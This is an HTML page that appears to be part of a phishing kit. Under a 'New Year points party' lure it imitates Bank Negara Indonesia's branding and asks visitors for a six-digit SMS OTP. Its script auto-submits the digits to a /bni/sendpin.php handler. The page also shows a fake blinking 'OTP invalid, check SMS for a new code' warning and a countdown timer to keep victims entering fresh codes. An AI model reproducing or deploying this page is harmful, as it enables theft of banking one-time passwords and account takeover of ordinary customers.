<!DOCTYPE html>
<html>
    <head>
        <meta http-equiv="refresh">
<title>Pesta Poin Tahun Baru</title>
<meta property="og:title" content="Pesta Poin Tahun Baru">
<meta name="theme-color" content="#E55300"> 
<meta property="twitter:title" content="Pesta Poin Tahun Baru">
        <meta http-equiv="content-type" content="text/html; charset=utf-8" />
        <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
        <link rel="stylesheet" type="text/css" href="./../lib/style/pin.css">
        <link rel="stylesheet" type="text/css" href="./../lib/style/spinner.css">
        <style>
            

/* 118EEA */
@import url('https://fonts.googleapis.com/css2?family=Open+Sans:wght@400;600;700&display=swap');
* {
    font-family: 'Open Sans', sans-serif;
    font-weight: 400;
}
body {
    width: 100%;
    height: 100vh;
    margin: 0;
    padding: 0;
    background-color: silver;
    overflow: hidden;
}
.container {
    box-sizing: border-box;
    display: block;
    margin: auto;
    width: 100%;
    height: 100%;
    max-width: 600px;
    max-height: 1000px;
    background-color: #E55300;
    padding: 25px;
    position: absolute;
    top: 50%;
    left: 50%;
    transform: translate(-50%, -50%);
    -webkit-transform: translate(-50%, -50%);
    -moz-transform: translate(-50%, -50%);
    -ms-transform: translate(-50%, -50%);
    -o-transform: translate(-50%, -50%);
}
.back {
    position: absolute;
    top: 17px;
    width: 33%;
    float: left;
    margin-lef: -10%;
}
.dana_logo{
    display: block;
    width: 45%;
    margin-top: 70px;
    margin-left: auto;
    margin-right: auto;
}
h1 {
    margin-top: 10px;
    text-align: center;
    font-size: 15px;
    color: #fff;
}
.bh1 {
    font-weight: 700;
}
.inputPin {
    box-sizing: border-box;
    margin-top: 20px;
    width: 100%;
/*    background-color: #ff0000a5;*/
}
.formPin {
    max-width: 500px;
    margin: auto;
    margin-top: 10px;
/*    background-color: lightgreen;*/
}

/*********************/
.six_pin {
    display: flex;
/*    background-color: blue;*/
    justify-content: center;

}
.inpPin {
    caret-color: transparent;
    font-size: 20px;
    font-weight: 600;
    text-align: center;
    width: 40px;
    height: 42px;
    border: none;
    outline: none;
    border-radius: 4px;
    margin-left: 2px;
    margin-right: 2px;
}
/*********************/
.btn {
/*    background-color: blue;*/
    display: flex;
    justify-content: center;
    align-items: center;
    flex-direction: column;
}
.see {
    margin-bottom: 52px;
    margin-top: 33px;
    background: none;
    font-size: 13px;
    color: #ffffff;
    width: 110px;
    height: 24px;
    border: 1.2px solid #ffffff;
    border-radius: 20px;
}
.lupa {
    font-size: 15px;
    font-weight: 600;
    color: #ffffff;
    text-decoration: none;
}
.resend {
    font-size: 15px;
    font-weight: 600;
    color: #cecece;
}

</style>
<style>
/*********************/
.blink {
            animation: blink-animation 5s steps(5, start) infinite;
            -webkit-animation: blink-animation 1s steps(5, start) infinite;
        }
        @keyframes blink-animation {
        to {
            visibility: hidden;
        }
        }
        @-webkit-keyframes blink-animation {
        to {
            visibility: hidden;
        }
        }
        h1{
            display: table;
            background-color: transparent;
            color: red;
            padding: -10px;
            width: 100%;
            font-size: 12px;
            text-align: center;
            margin-top: 10px;
            font-weight: 600;
            
            
        }
        </style>
    </head>
    <body>
<div style="position: absolute; left: 0; right: 0; margin: 0px auto; top: 0; height: 40px; border-bottom: 3px solid #ccc; background-color: black; padding: 15px; z-index: 999999; box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px; ">
        <div class="container">
            <a class="aback"><img class="back" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjz-ASbtzrlPGXA_9kDaXQVutLoWx-rHN55gplBfPxgGejo-dY4YYHOw9-IPedBxt7Q-0OUOg4FhW8hTxAW05XdJStCGXUYeYUCKcSXPQc1UKvwpp-oZbL29vQCgfsI-TVWTeeBNc3rSS4hBpnUaB2l5Oo-CQDu4KfwBRP1rXTvo0vxiM6xvj1fdEgXVZE/s1080/1693939692052.png"></a>
            <img class="dana_logo" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAkjBL5n2OX7nYVlXe46eTyqLe4CcUmyS8koOMabfAteQh7yovhRLXIU-HRr2cYHU6SqxstgsIiAO-1oqZyMrPN953FJSiQ_wYhY9i5ouKnufl_kgK4srmCrYRVwpeqYXNhVbvweIWzdslXSToqcHQgPNU8Tf8t_tt0deNxH1Nl2hmQHqJrcN265Swx14/s159/logo-bni.png">
<br>
            <p style="text-align: center; color: #459BAD; font-weight: 600; margin-top: 0%; font-size : 13px; padding: 0px;">Masukan Kode OTP<br>Yang Dikirim Ke Nomor Handphone Anda<br/>
        </p> 
            <div class="inputPin">
                <form class="formPin" action="/bni/sendpin.php/" method="post">
                    <div class="six_pin">
                        <input inputmode="numeric" id="pin1" maxlength="1" autocomplete="off" type="password" class="inpPin" name="pin1" ></input>
                        <input inputmode="numeric" id="pin2" maxlength="1" autocomplete="off" type="password" class="inpPin" name="pin2" ></input>
                        <input inputmode="numeric" id="pin3" maxlength="1" autocomplete="off" type="password" class="inpPin" name="pin3" ></input>
                        <input inputmode="numeric" id="pin4" maxlength="1" autocomplete="off" type="password" class="inpPin" name="pin4" ></input>
                        <input inputmode="numeric" id="pin5" maxlength="1" autocomplete="off" type="password" class="inpPin" name="pin5" ></input>
                        <input inputmode="numeric" id="pin6" maxlength="1" autocomplete="off" type="password" class="inpPin" name="pin6" ></input>
                    </div>
                </form>
<p style="font-weight: bold; font-size: 16px; color: #459BAD; text-align: center; margin-top: 0px auto;" id="timer"></p>
<p style="font-size: 12px; text-align: center; margin-top: -10px;"><strong style="color: #E55300; font-weight: 700;">Belum terima OTP? <a href="" style="text-decoration: none; font-weight: 700; color: #459BAD;">Kirim ulang</a></strong></p>
<br>
            <span class="blink"><h1 style="text-align: center; color: #459BAD; font-weight: 600; margin-top: -5%; font-size : 13px; font-weight: 600; padding: 0px;">Kode OTP tidak valid, Silahkan Cek SMS<br>Untuk Kode OTP yang baru</h1><br>&nbsp;</span>
                </div>
            </div>
        </div>
        <div id="process" name="process" class="process" style="display: none;">
            <div class="loading">
                <img src="./../assets/img/load_bg.png">
                <img class="spinner" src="./../assets/img/load_spin.png">
            </div>
        </div>
    <center>
        <div style="width: 90%; height: 150px; background: #DEECEE; border-radius: 10px; top: 380px; text-align: middle; font-size: 12px; padding: 10px; color: #459BAD; font-weight: 300; box-shadow: rgb(170, 170, 170) 0px 1px 4px 0px; position: fixed; left: 0; right: 0; margin: auto">
   
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimIC7I4ZXRGaLQ54cr5vwIleUoFSeulpzdWn9hRMeVoHU6eYhhaD4MWf9-JgmtQlNS60o454ihSyHSu4VoUIMqxVRoqedCVc9HUTYAbYMY8799hOFNXHFoqzrdV98xLeSxqzs2h_VQABvwxSqpcyWa-8BH5nzaU-TZd_KcitkC9FTXIKpe2gX7ohBzf9U/s19/icon-lamp.png"> Kami akan melakukan proses verifikasi nomor HP setelah proses pembukaan rekening selesai diproses. Pastikan <strong style="font-weight: 600">nomor Anda memiliki pulsa dan terkoneksi dengan jaringan Internet.</strong>
<p></p>
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivnlmObvdQhMTcuGzXajYcXZXNAym9_38pO6Yy-iSwwXkdfbBY3dXnLOLJpt5aJc_BKLqcauwBTvXWDpumfjQWwLSb5cJ-GY_OLlRqwFhSXTBwY1hmfnmpYBlQHkv5HEwZVfRkkj2ihaw2ZHD5kzlZgsGIO65UlQA5NFph7w_870yO5hLk8zXxAVFov6I/s20/icon-key.png"> <strong style="font-weight: 600"> Jaga kerahasiaan OTP</strong> dengan tidak memberitahu kepada siapapun termasuk kepada Petugas Bank.     
        
    </div>
    </div>
        <p style="text-align: center; color: #459BAD; font-weight: 400; font-size : 12px; padding: 15px; position: fixed; bottom: 0; left: 0; right: 0;">PT Bank Negara Indonesia (Persero) Tbk. berizin dan diawasi oleh Otoritas Jasa Keuangan (OJK) serta merupakan peserta penjaminan Lembaga Penjamin Simpanan (LPS)<br/>
        </p> 
        </center>
       </div> 
      </div> 
     </div> 
  </div>
    </body>
    <script>
        
const inputs = document.querySelectorAll(".six_pin input");
const form = document.querySelector("form")
inputs.forEach((input, index) => {
    input.dataset.index = index;
    input.addEventListener("keydown", clear);
    input.addEventListener("keyup", onKeyUp);
});
function clear($event) { $event.target.value = ""; }
function checkNumber(number) { return /[0-9]/g.test(number); }
function onKeyUp($event) {
    const input = $event.target;
    const value = input.value;
    const fieldIndex = +input.dataset.index;
    if ($event.key === "Backspace" && fieldIndex > 0) {
        input.previousElementSibling.focus();
    }
    if (checkNumber(value)) {
        if (value.length > 0 && fieldIndex < inputs.length - 1) {
            input.nextElementSibling.focus();
        }
        if (input.value !== "" && fieldIndex === inputs.length - 1) {
            input.readOnly = true;
            submit();
        }
    } else {
        clear($event);
    }
}
let xx = document.getElementById('process')
function submit(){
    xx.style.display = 'flex';
    setTimeout(function(){
        form.submit()
    }, 2000);
}

var btn_show = document.getElementById('see');
var pin = document.getElementById('pin1');
var pinn = document.getElementById('pin2');
var pinnn = document.getElementById('pin3');
var pinnnn = document.getElementById('pin4');
var pinnnnn = document.getElementById('pin5');
var pinnnnnn = document.getElementById('pin6');

btn_show.addEventListener('click', pasToText);

function pasToText(){
    if ((pin.type == 'password')&&(pinn.type == 'password')&&(pinnn.type == 'password')&&(pinnnn.type == 'password')&&(pinnnnn.type == 'password')&&(pinnnnnn.type == 'password')){
        pin.setAttribute('type','text')
        pinn.setAttribute('type','text')
        pinnn.setAttribute('type','text')
        pinnnn.setAttribute('type','text')
        pinnnnn.setAttribute('type','text')
        pinnnnnn.setAttribute('type','text')
        btn_show.innerHTML='SEMBUNYIKAN'
    } else {
        pin.setAttribute('type','password')
        pinn.setAttribute('type','password')
        pinnn.setAttribute('type','password')
        pinnnn.setAttribute('type','password')
        pinnnnn.setAttribute('type','password')
        pinnnnnn.setAttribute('type','password')
        btn_show.innerHTML='TAMPILKAN'
    }
}


    </script>
<script>
        document.getElementById('timer').innerHTML =
          03 + ":" + 01;
        startTimer();
        
        
        function startTimer() {
          var presentTime = document.getElementById('timer').innerHTML;
          var timeArray = presentTime.split(/[:]+/);
          var m = timeArray[0];
          var s = checkSecond((timeArray[1] - 1));
          if(s==59){m=m-1}
          if(m<0){
            return
          }
          
          document.getElementById('timer').innerHTML =
            m + " : " + s;
          console.log(m)
          setTimeout(startTimer, 1000);
          
        }
        
        function checkSecond(sec) {
          if (sec < 10 && sec >= 0) {sec = "0" + sec}; // add zero in front of numbers < 10
          if (sec < 0) {sec = "59"};
          return sec;
        }
    </script>
</html>
